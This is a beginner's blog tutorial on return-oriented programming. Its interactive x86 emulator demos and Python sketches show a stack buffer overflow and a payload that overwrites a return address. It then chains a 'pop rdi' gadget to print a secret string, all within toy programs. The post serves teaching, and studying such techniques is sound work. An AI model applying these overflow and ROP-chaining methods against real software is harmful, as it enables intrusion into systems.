Interactive Beginner's Guide to ROP -- Vetle's HackShack


Return-oriented Programming (ROP) is a binary exploitation technique that leverages existing code in the binary in order to execute attacker code.

To follow this post, it helps to have at least a basic understanding of x86 assembly.

Since most modern computers running on Intel chips are 64-bit, this guide uses 64-bit as well. Note, however, that because of limitations of JavaScript and of the emulator's developer, registers cannot actually hold full 64-bit values, and values that are too large will be rounded down. If anybody wants to help me with that (without BigInt), that would be really helpful. Emulator repository: http://github.com/bordplate/js86

Note that the interactive demos will not work in Edge and Internet Explorer because they use JavaScript functionality not present in those browsers. Browsers that have been tested to work are Firefox, Safari, Opera and Google Chrome.

Note on endianness: I have chosen not to address it, as I feel it complicates things without much benefit. As a result, the endianness of the emulator is not correct for Intel x86. If you’d like, you can read more about endianness on Wikipedia.

Stack

In ROP, the stack is an important element because it holds the “return” values that we want to control. But first I want to make sure we have an understanding of how the stack works.

The stack is a memory region at the end of a program's memory space where the program can store short-lived temporary values. Like stacking plates in a cupboard, the last plate you stack on top will be the first one to come off the stack again. In memory, the stack grows from a higher memory address into the lower addresses, so the first value put onto the stack will reside at the highest memory address, while the last value put onto the stack will reside at the lowest memory address. To keep track of where in memory the last value pushed to the stack is, we have the stack pointer; in x86 that’s a register called RSP. RSP always points to the value most recently pushed: a push first moves RSP down to make room and then writes the value there.
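If it helps to see that in ordinary code, here is a minimal Python sketch of a downward-growing stack. The `Stack` class and its method names are made up for illustration and are not part of the emulator; the starting address 0x256 is borrowed from the demos in this post.

```python
class Stack:
    """Toy model of a downward-growing stack (hypothetical, not the emulator's code)."""

    WORD = 8  # bytes per stack slot on a 64-bit machine

    def __init__(self, top=0x256):
        self.memory = {}   # address -> value, one entry per 8-byte slot
        self.rsp = top     # the stack pointer starts at the highest address

    def push(self, value):
        self.rsp -= self.WORD          # grow towards lower addresses
        self.memory[self.rsp] = value  # store at the new top of the stack

    def pop(self):
        value = self.memory.pop(self.rsp)  # read the current top of the stack
        self.rsp += self.WORD              # shrink back towards higher addresses
        return value


stack = Stack()
stack.push(1)            # first plate: ends up at the highest address
stack.push(2)            # last plate: ends up at the lowest address
first_out = stack.pop()  # the last value pushed comes off first
```

After these three operations `first_out` holds the second value pushed, and RSP sits 8 bytes below where it started because one value is still on the stack.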

Loading emulator...

Note: EAX is not a separate register; it is just the lower 32 bits of RAX. Read more about it here.

Above is a small program that moves the hex value 0x40414243 into the CPU register RAX and then pushes that value onto the stack. We’re watching all the bytes from memory address 0x24E to 0x255 (so we can see the first 8 bytes of the stack), as well as the stack pointer RSP and the RAX register.

When you step through it, you will first see RAX get the value 0x000040414243. Step again and you will see RSP change from 0x256 to 0x24E, and the last bytes in our stack memory region change to 0x40, 0x41, 0x42 and 0x43 (they correspond to the ASCII characters @, A, B and C).
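To make the byte layout concrete, here is a small Python sketch of what ends up in the 8 watched bytes. I am assuming the emulator stores the most significant byte first, which matches what the demo displays; a real x86 machine stores the least significant byte first.

```python
value = 0x40414243

# Byte order as displayed by the emulator in this post (assumption: most
# significant byte first, so the value's bytes land at the end of the slot).
emulator_bytes = value.to_bytes(8, "big")

# Byte order on a real x86 machine: least significant byte first (little-endian).
real_x86_bytes = value.to_bytes(8, "little")

rsp_before = 0x256
rsp_after = rsp_before - 8  # a 64-bit push moves RSP down by 8 bytes

print(hex(rsp_after))                # 0x24e
print(emulator_bytes[-4:].decode())  # @ABC
print(real_x86_bytes[:4].decode())   # CBA@
```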

Call and return

The register RIP is the instruction pointer; it points to the address of the next instruction that will run. A jmp 0x4c instruction can be compared to mov rip, 0x4c, meaning the next instruction that will run is at address 0x4c. call 0x4c, on the other hand, can be compared to the instructions push rip; jmp 0x4c, which put the current value of RIP (at that point already the address of the instruction after the call) on the stack before jumping to the specified address. call does this because it has an opposite named ret, which can be thought of as pop rip.

Loading emulator...

Note: The int 3-instruction is specific to this emulator and just stops execution at that point.

Above you will see that when we call 0xc, the stack pointer RSP decreases by 8 (because 64-bit addresses are 8 bytes) and the byte at memory address 0x255 changes from 0x00 to 0x0A, which is the address of the instruction after call 0xc. Then, when we hit ret, the stack pointer’s value is back to 0x256 and we jump to address 0x0A, where we hit int 3, which is this emulator’s instruction for shutting down.
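The same round trip can be sketched in Python. The `call` and `ret` helpers below are only a model of the "push rip; jmp" and "pop rip" comparison, with the register file as a plain dictionary; none of this is the emulator's actual code.

```python
WORD = 8  # 64-bit return addresses occupy 8 bytes


def call(cpu, stack, target):
    """Model of `call target`: push the return address, then jump."""
    cpu["rsp"] -= WORD
    stack[cpu["rsp"]] = cpu["rip"]  # RIP already points at the next instruction
    cpu["rip"] = target


def ret(cpu, stack):
    """Model of `ret`: pop the saved address back into RIP."""
    cpu["rip"] = stack.pop(cpu["rsp"])
    cpu["rsp"] += WORD


# RIP holds 0x0A, the address of the instruction after the call.
cpu = {"rip": 0x0A, "rsp": 0x256}
stack = {}

call(cpu, stack, 0x0C)
after_call = dict(cpu)  # snapshot taken inside the called code
ret(cpu, stack)
```

`after_call` shows RIP at 0x0C with RSP at 0x24E, and after `ret` both registers are back to their starting values.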

Here’s a demonstration of multiple nested calls and returns, and you will see the stack grow and shrink for each call and return, respectively.

Loading emulator...

Sometimes, we’d like to have variables like strings from user-input on our stack, variables we only need temporarily, or just need to manipulate or format before storing more permanently somewhere else in memory. More often than not, a string is larger than what we can hold in one register (8 bytes for 64-bit CPUs, 4 bytes for 32-bit CPUs). Thus, instead of pushing from a register onto the stack, we subtract the amount of space we think we need from RSP and then just directly write to the address of RSP.

Loading emulator...

If you reach int 2 and it does not progress, write something in the black console and hit enter.

In this demonstration you will see that we subtract 16 (0x10) bytes from RSP, which means we now have 16 bytes of stack space to play with. In this emulator we have int 2, which waits for user input until the first line break (ASCII 0x0a) or up to the number of characters specified in RSI, and places the input at the address specified in RDI. In this case RDI will be 0x246, which means int 2 will put the user input starting at address 0x246. RSI will be 0x10, which means int 2 will read and store a maximum of 16 bytes at the memory address specified in RDI. As we have only allocated 16 bytes of stack space for stack variables, we only want to read 16 bytes of user input so we don’t run out of space if a user enters too much data.
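Here is a rough Python model of that bounded read. `read_input` is a hypothetical stand-in for int 2, written only from the description above; in particular, dropping the line break instead of storing it is my assumption.

```python
def read_input(memory, rdi, rsi, data):
    """Hypothetical stand-in for int 2: copy input to memory starting at rdi,
    stopping at the first line break or after rsi bytes, whichever comes first."""
    line = data.split(b"\n", 1)[0]  # stop at the first line break (0x0a)
    chunk = line[:rsi]              # never copy more than RSI bytes
    memory[rdi:rdi + len(chunk)] = chunk
    return len(chunk)


memory = bytearray(0x256)  # toy address space; the stack ends at 0x256
rsp = 0x256
rsp -= 0x10                # sub rsp, 0x10: reserve 16 bytes
rdi, rsi = rsp, 0x10       # destination 0x246, at most 16 bytes

# The user types 40 characters, but only 16 are stored.
written = read_input(memory, rdi, rsi, b"A" * 40 + b"\n")
```

Because the limit in RSI matches the reserved space, the extra 24 characters are simply discarded and nothing outside the buffer is touched.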

A dangerous situation arises when user input can exceed the space we allocated for the variable.

Loading emulator...

Above you will see that you have the ability to control what will be popped into RAX, if you carefully craft the input.
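The sketch below replays that idea in Python under an assumed layout, which may differ from the demo's program: a saved 8-byte value sits directly above a 16-byte buffer, and the read limit (24) is larger than the buffer. The byte order again follows the emulator's most-significant-byte-first display.

```python
WORD = 8
memory = bytearray(0x256)
rsp = 0x256

# push: a value the program expects to pop back later
rsp -= WORD
memory[rsp:rsp + WORD] = (0x1111111111111111).to_bytes(WORD, "big")

# sub rsp, 0x10: reserve a 16-byte buffer just below the saved value
rsp -= 0x10
buffer_start = rsp

# The bug (assumed): the read limit is 24 bytes, but the buffer holds only 16.
limit = 24
user_input = b"A" * 16 + (0x4243444546474849).to_bytes(WORD, "big")
chunk = user_input[:limit]
memory[buffer_start:buffer_start + len(chunk)] = chunk

# add rsp, 0x10 ; pop rax
rsp += 0x10
rax = int.from_bytes(memory[rsp:rsp + WORD], "big")
rsp += WORD
```

The first 16 bytes of input fill the buffer, and the next 8 replace the saved value, so RAX ends up holding bytes chosen by whoever typed the input.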

Controlling the instruction pointer

With this principle we can also control RIP, as long as we can overwrite a value that will be popped into it. As you know, a ret instruction does exactly that when returning from a call.

Loading emulator...

Above is a program that is vulnerable to a stack buffer overflow, where you will be able to divert program execution to an address of your choosing. To input a raw byte, prefix its hex value with \x, so \x00 is null and \x0a is newline (10 in decimal). The goal here is to get to address 0x0000000000000020, where 0x12345678 is moved into EAX.

I can recommend this CyberChef recipe for easily turning HEX into C-style byte literals for use when creating your payload.
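If you would rather script it, here is a small Python sketch that builds such a payload and prints it in \x notation. The buffer size of 16 and the byte order (most significant byte first, as the emulator displays values) are assumptions; check the demo's disassembly and memory view and adjust them.

```python
def to_escapes(data: bytes) -> str:
    """Render bytes as \\xNN escapes, the raw-byte notation the demo console accepts."""
    return "".join(f"\\x{b:02x}" for b in data)


BUFFER_SIZE = 16  # assumption: look at the demo's `sub rsp, ...` for the real size
TARGET = 0x20     # address we want `ret` to pop into RIP

padding = b"A" * BUFFER_SIZE
# Assumption: most significant byte first, matching the emulator's display.
return_address = TARGET.to_bytes(8, "big")

payload = to_escapes(padding + return_address)
print(payload)
```

The printed string is the padding followed by the 8 bytes that overwrite the return address, ready to paste into the console.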

Function arguments

Function arguments are an important part of programming, and exactly how arguments are passed to a function differs from platform to platform depending on CPU architecture and bitness. You can read more about calling conventions on Wikipedia; they’ve got it well covered.

Loading emulator...

Above is a program that moves the value 0xE into RDI; this is the address of a string loaded in memory. Then we call int 1, which is a print sort of function that takes its one argument in RDI. That means that if we could control the value of RDI somehow, then we could also control what is printed when int 1 is called.
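A quick Python sketch of why that matters: `print_string` below is a hypothetical stand-in for int 1 that returns whatever string sits at the address in RDI. The strings, the second address 0x40 and the null terminator are placeholders of mine, not the demo's actual contents.

```python
def print_string(memory, rdi):
    """Hypothetical stand-in for int 1: return the string stored at address rdi."""
    end = memory.index(0, rdi)  # assumption: strings are null-terminated
    return memory[rdi:end].decode("ascii")


memory = bytearray(0x100)
memory[0x0E:0x0E + 6] = b"hello\x00"   # placeholder text at the intended address
memory[0x40:0x40 + 7] = b"secret\x00"  # some other string elsewhere in memory

normal = print_string(memory, 0x0E)    # what the program intends to print
hijacked = print_string(memory, 0x40)  # what it prints if an attacker controls RDI
```

The print routine itself never changes; only the value in RDI decides which string comes out.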

Controlling RIP and RDI to print a secret string

Now we should have enough pieces to puzzle together a longer exploit chain. In the next demo, you will have to chain together multiple returns in order to pop the address of the secret string into RDI and then ret to int 1 so that it prints out whatever is at the address in RDI.

Loading emulator...

The secret string is at address 0x55.

One of the tricky parts here is to figure out where in your input the return values and arguments should be. Just remember your end goal: print the string at address 0x55. Your steps should look similar to this:

  • pop rdi with value 0x0000000000000055.
  • ret to address 0x0000000000000039 to print the string at the address specified in RDI.
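The two steps above can be sketched as a chain of 8-byte words in Python. `POP_RDI_GADGET` is a hypothetical address for a `pop rdi; ret` sequence and `BUFFER_SIZE` is an assumed buffer size; find the real values in the demo's disassembly. Only 0x55 and 0x39 come from this post.

```python
POP_RDI_GADGET = 0x30  # hypothetical address of a `pop rdi; ret` sequence
PRINT_ADDR = 0x39      # from the post: prints the string at the address in RDI
SECRET_ADDR = 0x55     # from the post: address of the secret string
BUFFER_SIZE = 16       # assumption: size of the overflowed buffer

# Order matters: each ret or pop consumes the next 8-byte word on the stack.
chain = [POP_RDI_GADGET, SECRET_ADDR, PRINT_ADDR]
payload = b"A" * BUFFER_SIZE + b"".join(w.to_bytes(8, "big") for w in chain)

# Replay what the CPU does with the overwritten stack, one word at a time.
words = [int.from_bytes(payload[i:i + 8], "big")
         for i in range(BUFFER_SIZE, len(payload), 8)]
regs = {"rip": None, "rdi": None}

regs["rip"] = words.pop(0)  # ret: pops the gadget address into RIP
regs["rdi"] = words.pop(0)  # pop rdi: loads the secret string's address
regs["rip"] = words.pop(0)  # ret: jumps to the print code
```

For the additional challenge, one more word appended to `chain` would be consumed by a further ret, if the print code ends in one.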

As an additional challenge, after you have printed the secret string, try to also get the program to exit cleanly by calling int 3.

I can recommend this CyberChef recipe for easily turning HEX into C-style byte literals for use when creating your payload.

Check out the emulator code on GitHub.

I’d love some feedback over at Twitter: @bordplate.

If you’re looking for a job, consider coming to work with me in Norway.